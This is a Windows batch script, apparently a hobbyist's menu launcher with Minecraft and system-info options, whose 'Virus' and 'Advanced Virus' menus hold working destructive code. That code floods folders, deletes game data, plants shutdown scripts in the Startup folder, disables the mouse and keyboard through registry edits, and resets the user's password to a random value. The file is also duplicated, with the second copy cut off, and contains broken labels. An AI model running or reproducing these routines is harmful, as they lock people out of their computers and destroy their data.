
@echo off
# Created by Chris Aldous
# Please don't edit this.
color 0e
title Chris' General Batch Launcher [D3V on NGU]
cls
GOTO Start
:Start2
cls
echo - Christopher's Batch Menu.
echo Hello %username%, Loading Menu...
ping localhost -n 2 > nul
ping localhost -n 2 > nul
ping localhost -n 1 > nul
ping localhost -n 1 > nul
GOTO Menu
:Menu
cls
echo - Welcome! to Christopher's Batch Menu.
echo 1 - Open Minecraft.
echo 2 - Computer Info.
echo 3 - Shutdown w/ Commands
echo 4 - Open Internet Explorer w/ Webpages
echo 5 - Open Folders, Locations, etc
echo 6 - Virus' Menu
echo 7 - Advanced Virus Menu
echo 8 - [Nothing - Empty - Reserved]
echo 9 - Copyright / Uses / Editing
echo 10 - Exit the Batch.
set /p QUESTION= What would you like to do?:
IF %QUESTION%==1 GOTO :MC
IF %QUESTION%==2 GOTO :Info
IF %QUESTION%==3 GOTO :Shut
IF %QUESTION%==4 GOTO :iExplorer
IF %QUESTION%==5 GOTO :Folders
IF %QUESTION%==6 GOTO :Virus
IF %QUESTION%==7 GOTO :A_Virus
IF %QUESTION%==8 GOTO :N/A
IF %QUESTION%==9 GOTO :Copyright
IF %QUESTION%==10 GOTO :QUIT
IF %QUESTION%==Admin GOTO :Admin
:MC
cls
echo - Christopher's Batch Menu.
echo 1 - Open Minecraft with 512MB Memory.
echo 2 - Open Minecraft with 1GB Memory.
echo 3 - Go Back.
echo 4 - Exit the Batch.
set /p QUESTION2= What would you like to do?:
IF %QUESTION2%==1 GOTO :MC512
IF %QUESTION2%==2 GOTO :MC1GB
IF %QUESTION2%==3 GOTO :Menu
IF %QUESTION2%==4 GOTO :QUIT
:QUIT
echo Thank you for using Chris' Batch file.
%QUESTION2%
ping localhost -n 2 > nul
ping localhost -n 2 > nul
exit
:MC512
set /p Name = What would you like your name for online to be?:
java -Xms512m -Xmx1024m -cp "%APPDATA%\.minecraft\bin\*" -Djava.library.path="%APPDATA%\.minecraft\bin\natives" net.minecraft.client.Minecraft "%Name%"
"%Name%"
pause
cls
GOTO Menu
:MC1GB
set /p Name = What would you like your name for online to be?:
java -Xms1024m -Xmx2056m -cp "%APPDATA%\.minecraft\bin\*" -Djava.library.path="%APPDATA%\.minecraft\bin\natives" net.minecraft.client.Minecraft "%Name%"
pause
cls
GOTO Menu
:Info
cls
echo - Christopher's Batch Menu.
echo Logged in as: %username%
echo Computer Name: %COMPUTERNAME%
time /t
date /t
echo --------
echo Your Directory: %windir%
echo Your User Profile %userprofile%
echo Operating System: %OS%
echo Number of Processors: %NUMBER_OF_PROCESSORS%
echo System Drive: %SystemDrive%
pause
cls
GOto Menu
:Shut
cls
echo - Christopher's Batch Menu.
echo 1 - Shutdown w/ Timer
echo 2 - Shutdown w/ Timer, Comment
echo 3 - Shutdown w/ Timer, Restart
echo 4 - Abort Shutdown.
echo 5 - Go Back.
echo 6 - Exit Batch.
set /p QUESTION3= What would you like to do?
IF %QUESTION3%==1 GOTO :Shut-t
IF %QUESTION3%==2 GOTO :Shut-t-c
IF %QUESTION3%==3 GOTO :Shut-r
IF %QUESTION3%==4 GOTO :shut-a
IF %QUESTION3%==5 GOTO :Menu
IF %QUESTION3%==6 GOTO :Quit
:Shut-t
cls
echo - Christopher's Batch Menu.
set /p Shutdown_timer= How long untill your computer shutsdown? [In Seconds]
shutdown -s -t %Shutdown_timer%
echo Time set for: %Shutdown_timer% seconds.
pause
cls
GOTO Menu
:shut-t-c
cls
echo - Christopher's Batch Menu.
set /p shutdown_timer1= How Long untill your Computer shutsdown? [In Seconds]-
set /p shutdown_comment= What would you like your comment to be? [No Spaces]-
shutdown -s -t %shutdown_timer1% -c %shutdown_comment%
echo Timer set for: %shutdown_timer1% seconds.
echo Comment set for: %shutdown_comment%.
pause
cls
GOTO Menu
:shut-
cls
echo - Christopher's Batch Menu.
set /p shutdown_restart= How Long untill your Computer Restarts? [In Seconds]-
shutdown -r -t %shutdown_restart%
echo Restart set for: %shutdown_restart% seconds.
pause
cls
GOTO Menu
:shut-a
cls
echo - Christopher's Batch Menu.
echo 1 - Abort Shutdown.
echo 2 - Back to Menu.
set /p shutdown_abort= What Would you like to do?:
IF %shutdown_abort%==1 GOTO :shutdown_abort_true
IF %shutdown_abort%==2 GOTO :Menu
:shutdown_abort_true
cls
echo - Christopher's Batch Menu.
shutdown -a
echo Shutdown Aborted or No Shutdown was found.
pause
cls
GOTO Menu
:iExplorer
cls
echo - Christopher's Batch Menu.
echo Note: These do not Bypass Firewalls/Proxies etc.
echo 1 - Open Internet Explorer.
echo 2 - Google.com
echo 3 - Facbook.com
echo 4 - Go Back.
echo 5 - Exit Batch
echo [Might add more later?]
set /p iExplorer_open= What would you like to do?:
IF %iExplorer_open%==1 GOTO :iExplorer_start
IF %iExplorer_open%==2 GOTO :iExplorer_Google
IF %iExplorer_open%==3 GOTO :iExplorer_Facebook
IF %iExplorer_open%==4 GOTO :Menu
IF %iExplorer_open%==5 GOTO :Quit
:iExplorer_google
start iexplore https://www.google.com.au
pause
cls
GOTO Menu
:iExplorer_facebook
start iexplore https://www.facebook.com/
pause
cls
GOTO Menu
:iExplorer_start
start iexplore
pause
cls
GOTO Menu
:Folders
cls
echo - Christopher's Batch Menu.
echo 1 - Drive C:\
echo 2 - %username%'s Folders
echo 3 - ProgramData Folder
echo 4 - System Root
echo 5 - Public Folder
echo 6 - Start-up Folder
echo 7 - Go Back.
echo 8 - Exit Batch.
set /p folder_open= What would you like to do?:
IF %folder_open%==1 GOTO :folder_c
IF %folder_open%==2 GOTO :folder_Username
IF %folder_open%==3 GOTO :folder_prodata
IF %folder_open%==4 GOTO :folder_sysroot
IF %folder_open%==5 GOTO :folder_public
IF %folder_open%==6 GOTO :folder_startup
IF %folder_open%==7 GOTO :Menu
IF %folder_open%==8 GOTO :Quit
:folder_c
start C:\
pause
cls
GOTO Menu
:folder_username
start %userprofile%
pause
cls
GOTO Menu
:folder_prodata
start %programdata%
pause
cls
GOTO Menu
:folder_sysroot
start %systemroot%
pause
cls
GOTO Menu
:folder_public
start %PUBLIC%
pause
cls
GOTO Menu
:folder_startup
explorer %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
pause
cls
GOTO Menu
:Start
cls
echo - Welcome! to Christopher's Batch Menu.
echo Please do not claim this to be your material or any of your work
echo Editing of the file is frowned apon, (Adding more Links etc is allowed)
echo The Uses of this Batch is a general menu of everything I have learnt, and for a future reference.
echo Using this Batch file to help you make your files is allowed.
echo Minecraft will not work unless you have the game properly installed
echo Agreeing to this means you will (Hopefully) Follow these guidelines.
echo .
echo 1 - Yes
echo 2 - No
set /p start= Do You agree to these terms and conditions?:
IF %Start%==1 GOTO :Start2
IF %Start%==2 GOTO
elete
:Copyright
cls
echo - Christopher's Batch Menu.
echo Please do not claim this to be your material or any of your work
echo Editing of the file is frowned apon, (Adding more Links etc is allowed)
echo The Uses of this Batch is a general menu of everything I have learnt, and for a future reference.
echo Using this Batch file to help you make your files is allowed.
echo Minecraft will not work unless you have the game properly installed
echo Agreeing to this means you will (Hopefully) Follow these guidelines.
echo .
echo 1 - Go Back.
echo 2 - Exit Batch.
set /p start= What Would you like to do?:
IF %Start%==1 GOTO :Menu
IF %Start%==2 GOTO :Quit
:delete
del %o%
exit
:virus
cls
echo - Christopher's Batch Menu.
echo Note: Any harm done with these tools is none of Chris' fault and refer to the user whom did it.
echo 1 - Folder spammer.
echo 2 - iExploer Dumper.
echo 3 - Minecraft Deletor.
echo 4 - Start-up Shutdown.
echo 5 - CMD Keylogger.
echo 6 - Go Back.
echo 7 - Exit Batch.
set /p Virus= What would you like to do?:
IF %Virus%==1 GOTO :Virus_Folder
IF %Virus%==2 GOTO :Virus_iExplorer
IF %Virus%==3 GOTO :Virus_Minecraft
IF %Virus%==4 GOTO :Virus_Start-up
IF %Virus%==5 GOTO :Virus_Keylogger
IF %Virus%==6 GOTO :Menu
IF %Virus%==7 GOTO :Quit
:Virus_Folder
echo Note: Your computer will slow down untill the dumping process is complete.
echo 1 - Random Amount
echo 2 - Custom Amount
echo 3 - Go Back.
echo 4 - Exit Back
IF %Virus_Folder_Question%==1 GOTO :Virus_Folder_Random
IF %Virus_Folder_Question%==2 GOTO :Virus_Folder_Custom
IF %Virus_Folder_Question%==3 GOTO :Menu
IF %Virus_Folder_Question%==4 GOTO :Quit
:Virus_Folder_Random
echo Note: The Random amount can be from 1 - 50,000 [Usually]
set /p folder_path_random= Where would you like to dump the folders? [Requires Location eg, %windir%]-
cd %folder_path_random%
set /p random1= The Random number is %Random%
echo Would you like to continue?
echo 1 - Yes
echo 2 - Go Back
echo 3 - Menu
echo 4 - Exit the Batch
set /p folder_random_Continue= What would you like to do?:
IF %folder_random_continue%==1 GOTO :folder_random_True
IF %folder_random_continue%==2 GOTO :Virus_folder_Random
for /l %%n in (1,1,%folder_amount%) DO md %%n
echo #%folder_amount% folders dumped at location: %folder_path%.
pause
cls
GOTO Menu
:Virus_Folder_Custom
set /p folder_Path= Where would you like to dump the folders? [Requires Location eg, %windir%]-
set /p folder_amount= How many folders would you like to dump?
cd %folder_Path%
for /l %%n in (1,1,%folder_amount%) DO md %%n
echo #%folder_amount% folders dumped at location: %folder_path%.
pause
cls
GOTO Menu
:Virus_iExplorer
echo Note: Your computer may slow down at the amount of iExplorer's being opened.
echo Menu - Go Back to Main Menu.
echo Back - Go Back to iExplorer Menu
echo Quit - Quit the Batch
set /p virus_iExplorer_amount= How many would iExplorer's would you like to open?
set _number=0
:virus_iexplorer_start
if %_number%==%virus_iexplorer_amount% goto Virus_iExplorer_end goto :virus_iexplorer_end
if %_number%==Menu goto :Menu
if %_number%==Back goto :Virus_iExplorer
if %_number%==Quit goto :Quit
set /a _number +=1
echo Hi
goto virus_iexplorer_start
:virus_iexplorer_end
pause
cls
GOTO Menu
:Virus_Minecraft
echo 1 - Delete Minecraft Contents
echo 2 - Go Back
echo 3 - Exit Batch
set /p virus_minecraft_delete= What would you like to do?:
IF %VIRUS_MINECRAFT_DELETE%==1 GOTO :virus_minecraft_true
IF %VIRUS_MINECRAFT_DELETE%==2 GOTO :Virus
IF %VIRUS_MINECRAFT_DELETE%==3 GOTO :Quit
:Virus_minecraft_true
del /s /q /s /q %appdata%\.minecraft\
del /s /q %appdata%\.minecraft\bin
del /s /q %appdata%\.minecraft\bin\natives
del /s /q %appdata%\.minecraft\mods
del /s /q %appdata%\.minecraft\resources
del /s /q %appdata%\.minecraft\resources\music
del /s /q %appdata%\.minecraft\resources\newmusic
del /s /q %appdata%\.minecraft\resources\newsound
del /s /q %appdata%\.minecraft\resources\sound
del /s /q %appdata%\.minecraft\resources\streaming
del /s /q %appdata%\.minecraft\saves
del /s /q %appdata%\.minecraft\screenshots
del /s /q %appdata%\.minecraft\stats
del /s /q %appdata%\.minecraft\texturepacks
pause
cls
GOTO Menu
:Virus_Start-up
echo Note: Shutdown files are Required to work. [Untill I Can get the /set command working]
echo 1 - Instant Shutdown
echo 2 - Shutdown w/ 60seconds
echo 3 - shutdown w/ 300 seconds
echo 4 - Go Back
echo 5 - Exit Batch
set /p virus_start-up_shutdown= What would you like to do?:
IF %virus_start-up_shutdown%==1 GOTO :virus_start-up_Ishutdown
IF %virus_start-up_shutdown%==2 GOTO :virus_start-up_60shutdown
IF %virus_start-up_shutdown%==3 GOTO :virus_start-up_300shutdown
IF %virus_start-up_shutdown%==4 GOTO :Virus
IF %virus_start-up_shutdown%==5 GOTO :Quit
:Virus_start-up_Ishutdown
echo 1 - Inject Shutdown file?
echo 2 - Go Back
echo 3 - Exit Batch
set /p Virus_start-up_IShutdown_Options= What would you like to do?:
IF %Virus_start-up_IShutdown_Options%==1 GOTO :Virus_Start-up_IShutdown_True
IF %virus_start-up_IShutdown_Options%==2 GOTO :Virus_Start-up_Shutdown
IF %virus_start-up_IShutdown_Options%==3 GOTO :Quit
:Virus_Start-up_IShutdown_True
xcopy "%cd%\DON'T_EDIT_ShutdownI.bat" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\"
pause
cls
GOTO Menu
:virus_start-up_60shutdown
echo 1 - Inject Shutdown file?
echo 2 - Go Back
echo 3 - Exit Batch
set /p virus_start-up_60shutdown_Options= What would you like to do?:
IF %virus_start-up_60shutdown_Options%==1 GOTO :virus_start-up_60shutdown_True
IF %virus_start-up_60shutdown_Options%==2 GOTO :Virus_Start-up_Shutdown
IF %virus_start-up_60shutdown_Options%==3 GOTO :Quit
:virus_start-up_60shutdown_True
xcopy "%cd%\DON'T_EDIT_60Shutdown.bat" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\"
pause
cls
GOTO Menu
:virus_start-up_300shutdown
echo 1 - Inject Shutdown file?
echo 2 - Go Back
echo 3 - Exit Batch
set /p virus_start-up_300shutdown_Options= What would you like to do?:
IF %virus_start-up_300shutdown_Options%==1 GOTO :virus_start-up_300shutdown_True
IF %virus_start-up_300shutdown_Options%==2 GOTO :Virus_Start-up_Shutdown
IF %virus_start-up_300shutdown_Options%==3 GOTO :Quit
:virus_start-up_300shutdown_True
xcopy "%cd%\DON'T_EDIT_300Shutdown.bat" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\"
pause
cls
GOTO Menu
:Virus_Keylogger
echo Note: This basically does nothing except save characters into a text file.
echo Note: Press Enter to save and go back to the Menu.
echo Keylogger .txt saved at %userprofile%.
echo >>%userprofile%\keys.txt
echo Keylogger Activated, Check %userprofile%\Keylogger.txt
set /p keys=
echo %keys%>>%userprofile%\Keylogger.txt
pause
cls
GOTO Menu
:Admin
echo Hello, You have Possibly edited the file or found out this secret area!
echo There is nothing here at all.
echo Good-bye
echo [This is usually used for my Practise area]
pause
cls
GOTO Menu
:N/A
cls
echo - Christopher's Batch Menu.
echo Hello, You have found a glitch in the system!
echo By Scott how did this happen?
echo Or else you somehow made it here via the menu.
echo -----------
echo Long story short, theres nothing here.
pause
cls
GOTO Menu
:A_Virus
cls
echo - Christopher's Batch Menu.
echo Note: Any harm done with these tools is none of Chris' fault and refer to the user whom did it.
echo Note: These are the "Big Boy Tools" Most of these will cause some harm and/or Damage.
echo 1 - Disable Mouse / Keyboard / Swap Mouse Buttons [Thanks to ".JiampyPotter" at NextGenUpdate]
echo 2 - Change %username%'s Password.
set /p A_Virus_Question= What would you like to do?:
IF %A_Virus_Question%==1 GOTO :A_Virus_K/A_D
IF %A_Virus_Question%==2 GOTO :A_Virus_Pass
:A_Virus_K/A_D
echo Thanks to "In Shadow Batch Virus Generator - v4.1.2"
echo Creator: ".JiampyPotter" at NextGenUpdate
echo 1 - Disable Mouse.
echo 2 - Disable Keyboard.
echo 3 - Swap Mouse Buttons.
echo 4 - Change %username%'s Password
echo 3 - Go Back.
echo 4 - Quit.
set /p A_Virus_K/A_D_Question= What would you like to do?:
IF %A_Virus_Question%==1 GOTO :A_Virus_K/A_D_Mouse
IF %A_Virus_Question%==2 GOTO :A_Virus_K/A_D_Keyboard
IF %A_Virus_Question%==3 GOTO :A_Virus_K/A_D
IF %A_Virus_Question%==4 GOTO :QUIT
:A_Virus_K/A_D_Mouse
echo Are you sure you want to disable the mouse?
echo 1 - Yes
echo 2 - No
set /p A_Virus_K/A_D_Mouse_Question= What would you like to do?
IF %A_Virus_K/A_D_Mouse_Question%==1 GOTO :A_Virus_K/A_D_Mouse_True
IF %A_Virus_K/A_D_Mouse_Question%==1 GOTO :A_Virus
:A_Virus_K/A_D_Mouse_True
SET Key= "HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %KEY%
reg add %KEY% /v Start /t REG_DWORD /d 4
pause
cls
GOTO Menu
:A_Virus_K/A_D_Keyboard
echo Are you sure you want to disable the keyboard?
echo 1 - Yes
echo 2 - No
set /p A_Virus_K/A_D_Keyboard_Question= What would you like to do?:
IF %A_Virus_K/A_D_Keyboard_Question%==1 GOTO :A_Virus_K/A_D_Keyboard_True
IF %A_Virus_K/A_D_Keyboard_Question%==2 GOTO :A_Virus
:A_Virus_K/A_D_Keyboard_True
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start nokeyboard.reg
pause
cls
GOTO Menu
:A_Virus_SwapM
echo 1 - Swap Mouse Buttons.
echo 2 - Go Back.
echo 3 - Exit batch.
set /p A_Virus_SwapM_Question= What would you like to do?:
IF %A_Virus_SwapM_Question%==1 GOTO :A_Virus_SwapM_True
IF %A_Virus_SwapM_Question%==2 GOTO :A_Virus
IF %A_Virus_SwapM_Question%==3 GOTO :Quit
:A_Virus_SwapM_True
echo Mouse buttons swapping.
RUNDLL32 USER32.DLL,SwapMouseButton
pause
cls
GOTO Menu
:A_Virus_Pass
echo Note: This only changes the current users password.
echo 1 - Random password.
echo 2 - Custom password.
echo 3 - Go Back.
echo 4 - Exit Batch.
set /p A_Virus_Pass_Question= What would you like to do?:
IF %A_Virus_Pass_Question%==1 GOTO :A_Virus_Pass_Random
IF %A_Virus_Pass_Question%==2 GOTO :A_Virus_Pass_Custom
IF %A_Virus_Pass_Question%==3 GOTO :A_Virus
IF %A_Virus_Pass_Question%==4 GOTO :Quit
:A_Virus_Pass_Random
echo Are you sure you want to change the current password?
echo [Will Display new password]
echo 1 - Yes
echo 2 - No
set /p A_Virus_Pass_Random_Question= What would you like to do?:
IF %A_Virus_Pass_Random_Question%==1 GOTO :A_Virus_Pass_Random_True
IF %A_Virus_Pass_Random_Question%==2 GOTO :A_Virus
:A_Virus_Pass_Random_True
set /a A_Virus_Pass_Random_True_Randompass= %random%%random%
echo The new password is %A_Virus_Pass_Random_True_Randompass%
net user %username% %A_Virus_Pass_Random_True_Randompass%
pause
cls
GOTO Menu

@echo off
# Created by Chris Aldous
# Please don't edit this.
color 0e
title Chris' General Batch Launcher [D3V on NGU]
cls
GOTO Start
:Start2
cls
echo - Christopher's Batch Menu.
echo Hello %username%, Loading Menu...
ping localhost -n 2 > nul
ping localhost -n 2 > nul
ping localhost -n 1 > nul
ping localhost -n 1 > nul
GOTO Menu
:Menu
cls
echo - Welcome! to Christopher's Batch Menu.
echo 1 - Open Minecraft.
echo 2 - Computer Info.
echo 3 - Shutdown w/ Commands
echo 4 - Open Internet Explorer w/ Webpages
echo 5 - Open Folders, Locations, etc
echo 6 - Virus' Menu
echo 7 - Advanced Virus Menu
echo 8 - [Nothing - Empty - Reserved]
echo 9 - Copyright / Uses / Editing
echo 10 - Exit the Batch.
set /p QUESTION= What would you like to do?:
IF %QUESTION%==1 GOTO :MC
IF %QUESTION%==2 GOTO :Info
IF %QUESTION%==3 GOTO :Shut
IF %QUESTION%==4 GOTO :iExplorer
IF %QUESTION%==5 GOTO :Folders
IF %QUESTION%==6 GOTO :Virus
IF %QUESTION%==7 GOTO :A_Virus
IF %QUESTION%==8 GOTO :N/A
IF %QUESTION%==9 GOTO :Copyright
IF %QUESTION%==10 GOTO :QUIT
IF %QUESTION%==Admin GOTO :Admin
:MC
cls
echo - Christopher's Batch Menu.
echo 1 - Open Minecraft with 512MB Memory.
echo 2 - Open Minecraft with 1GB Memory.
echo 3 - Go Back.
echo 4 - Exit the Batch.
set /p QUESTION2= What would you like to do?:
IF %QUESTION2%==1 GOTO :MC512
IF %QUESTION2%==2 GOTO :MC1GB
IF %QUESTION2%==3 GOTO :Menu
IF %QUESTION2%==4 GOTO :QUIT
:QUIT
echo Thank you for using Chris' Batch file.
%QUESTION2%
ping localhost -n 2 > nul
ping localhost -n 2 > nul
exit
:MC512
set /p Name = What would you like your name for online to be?:
java -Xms512m -Xmx1024m -cp "%APPDATA%\.minecraft\bin\*" -Djava.library.path="%APPDATA%\.minecraft\bin\natives" net.minecraft.client.Minecraft "%Name%"
"%Name%"
pause
cls
GOTO Menu
:MC1GB
set /p Name = What would you like your name for online to be?:
java -Xms1024m -Xmx2056m -cp "%APPDATA%\.minecraft\bin\*" -Djava.library.path="%APPDATA%\.minecraft\bin\natives" net.minecraft.client.Minecraft "%Name%"
pause
cls
GOTO Menu
:Info
cls
echo - Christopher's Batch Menu.
echo Logged in as: %username%
echo Computer Name: %COMPUTERNAME%
time /t
date /t
echo --------
echo Your Directory: %windir%
echo Your User Profile %userprofile%
echo Operating System: %OS%
echo Number of Processors: %NUMBER_OF_PROCESSORS%
echo System Drive: %SystemDrive%
pause
cls
GOto Menu
:Shut
cls
echo - Christopher's Batch Menu.
echo 1 - Shutdown w/ Timer
echo 2 - Shutdown w/ Timer, Comment
echo 3 - Shutdown w/ Timer, Restart
echo 4 - Abort Shutdown.
echo 5 - Go Back.
echo 6 - Exit Batch.
set /p QUESTION3= What would you like to do?
IF %QUESTION3%==1 GOTO :Shut-t
IF %QUESTION3%==2 GOTO :Shut-t-c
IF %QUESTION3%==3 GOTO :Shut-r
IF %QUESTION3%==4 GOTO :shut-a
IF %QUESTION3%==5 GOTO :Menu
IF %QUESTION3%==6 GOTO :Quit
:Shut-t
cls
echo - Christopher's Batch Menu.
set /p Shutdown_timer= How long untill your computer shutsdown? [In Seconds]
shutdown -s -t %Shutdown_timer%
echo Time set for: %Shutdown_timer% seconds.
pause
cls
GOTO Menu
:shut-t-c
cls
echo - Christopher's Batch Menu.
set /p shutdown_timer1= How Long untill your Computer shutsdown? [In Seconds]-
set /p shutdown_comment= What would you like your comment to be? [No Spaces]-
shutdown -s -t %shutdown_timer1% -c %shutdown_comment%
echo Timer set for: %shutdown_timer1% seconds.
echo Comment set for: %shutdown_comment%.
pause
cls
GOTO Menu
:shut-
cls
echo - Christopher's Batch Menu.
set /p shutdown_restart= How Long untill your Computer Restarts? [In Seconds]-
shutdown -r -t %shutdown_restart%
echo Restart set for: %shutdown_restart% seconds.
pause
cls
GOTO Menu
:shut-a
cls
echo - Christopher's Batch Menu.
echo 1 - Abort Shutdown.
echo 2 - Back to Menu.
set /p shutdown_abort= What Would you like to do?:
IF %shutdown_abort%==1 GOTO :shutdown_abort_true
IF %shutdown_abort%==2 GOTO :Menu
:shutdown_abort_true
cls
echo - Christopher's Batch Menu.
shutdown -a
echo Shutdown Aborted or No Shutdown was found.
pause
cls
GOTO Menu
:iExplorer
cls
echo - Christopher's Batch Menu.
echo Note: These do not Bypass Firewalls/Proxies etc.
echo 1 - Open Internet Explorer.
echo 2 - Google.com
echo 3 - Facbook.com
echo 4 - Go Back.
echo 5 - Exit Batch
echo [Might add more later?]
set /p iExplorer_open= What would you like to do?:
IF %iExplorer_open%==1 GOTO :iExplorer_start
IF %iExplorer_open%==2 GOTO :iExplorer_Google
IF %iExplorer_open%==3 GOTO :iExplorer_Facebook
IF %iExplorer_open%==4 GOTO :Menu
IF %iExplorer_open%==5 GOTO :Quit
:iExplorer_google
start iexplore https://www.google.com.au
pause
cls
GOTO Menu
:iExplorer_facebook
start iexplore https://www.facebook.com/
pause
cls
GOTO Menu
:iExplorer_start
start iexplore
pause
cls
GOTO Menu
:Folders
cls
echo - Christopher's Batch Menu.
echo 1 - Drive C:\
echo 2 - %username%'s Folders
echo 3 - ProgramData Folder
echo 4 - System Root
echo 5 - Public Folder
echo 6 - Start-up Folder
echo 7 - Go Back.
echo 8 - Exit Batch.
set /p folder_open= What would you like to do?:
IF %folder_open%==1 GOTO :folder_c
IF %folder_open%==2 GOTO :folder_Username
IF %folder_open%==3 GOTO :folder_prodata
IF %folder_open%==4 GOTO :folder_sysroot
IF %folder_open%==5 GOTO :folder_public
IF %folder_open%==6 GOTO :folder_startup
IF %folder_open%==7 GOTO :Menu
IF %folder_open%==8 GOTO :Quit
:folder_c
start C:\
pause
cls
GOTO Menu
:folder_username
start %userprofile%
pause
cls
GOTO Menu
:folder_prodata
start %programdata%
pause
cls
GOTO Menu
:folder_sysroot
start %systemroot%
pause
cls
GOTO Menu
:folder_public
start %PUBLIC%
pause
cls
GOTO Menu
:folder_startup
explorer %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
pause
cls
GOTO Menu
:Start
cls
echo - Welcome! to Christopher's Batch Menu.
echo Please do not claim this to be your material or any of your work
echo Editing of the file is frowned apon, (Adding more Links etc is allowed)
echo The Uses of this Batch is a general menu of everything I have learnt, and for a future reference.
echo Using this Batch file to help you make your files is allowed.
echo Minecraft will not work unless you have the game properly installed
echo Agreeing to this means you will (Hopefully) Follow these guidelines.
echo .
echo 1 - Yes
echo 2 - No
set /p start= Do You agree to these terms and conditions?:
IF %Start%==1 GOTO :Start2
IF %Start%==2 GOTO
elete
:Copyright
cls
echo - Christopher's Batch Menu.
echo Please do not claim this to be your material or any of your work
echo Editing of the file is frowned apon, (Adding more Links etc is allowed)
echo The Uses of this Batch is a general menu of everything I have learnt, and for a future reference.
echo Using this Batch file to help you make your files is allowed.
echo Minecraft will not work unless you have the game properly installed
echo Agreeing to this means you will (Hopefully) Follow these guidelines.
echo .
echo 1 - Go Back.
echo 2 - Exit Batch.
set /p start= What Would you like to do?:
IF %Start%==1 GOTO :Menu
IF %Start%==2 GOTO :Quit
:delete
del %o%
exit
:virus
cls
echo - Christopher's Batch Menu.
echo Note: Any harm done with these tools is none of Chris' fault and refer to the user whom did it.
echo 1 - Folder spammer.
echo 2 - iExploer Dumper.
echo 3 - Minecraft Deletor.
echo 4 - Start-up Shutdown.
echo 5 - CMD Keylogger.
echo 6 - Go Back.
echo 7 - Exit Batch.
set /p Virus= What would you like to do?:
IF %Virus%==1 GOTO :Virus_Folder
IF %Virus%==2 GOTO :Virus_iExplorer
IF %Virus%==3 GOTO :Virus_Minecraft
IF %Virus%==4 GOTO :Virus_Start-up
IF %Virus%==5 GOTO :Virus_Keylogger
IF %Virus%==6 GOTO :Menu
IF %Virus%==7 GOTO :Quit
:Virus_Folder
echo Note: Your computer will slow down untill the dumping process is complete.
echo 1 - Random Amount
echo 2 - Custom Amount
echo 3 - Go Back.
echo 4 - Exit Back
IF %Virus_Folder_Question%==1 GOTO :Virus_Folder_Random
IF %Virus_Folder_Question%==2 GOTO :Virus_Folder_Custom
IF %Virus_Folder_Question%==3 GOTO :Menu
IF %Virus_Folder_Question%==4 GOTO :Quit
:Virus_Folder_Random
echo Note: The Random amount can be from 1 - 50,000 [Usually]
set /p folder_path_random= Where would you like to dump the folders? [Requires Location eg, %windir%]-
cd %folder_path_random%
set /p random1= The Random number is %Random%
echo Would you like to continue?
echo 1 - Yes
echo 2 - Go Back
echo 3 - Menu
echo 4 - Exit the Batch
set /p folder_random_Continue= What would you like to do?:
IF %folder_random_continue%==1 GOTO :folder_random_True
IF %folder_random_continue%==2 GOTO :Virus_folder_Random
for /l %%n in (1,1,%folder_amount%) DO md %%n
echo #%folder_amount% folders dumped at location: %folder_path%.
pause
cls
GOTO Menu
:Virus_Folder_Custom
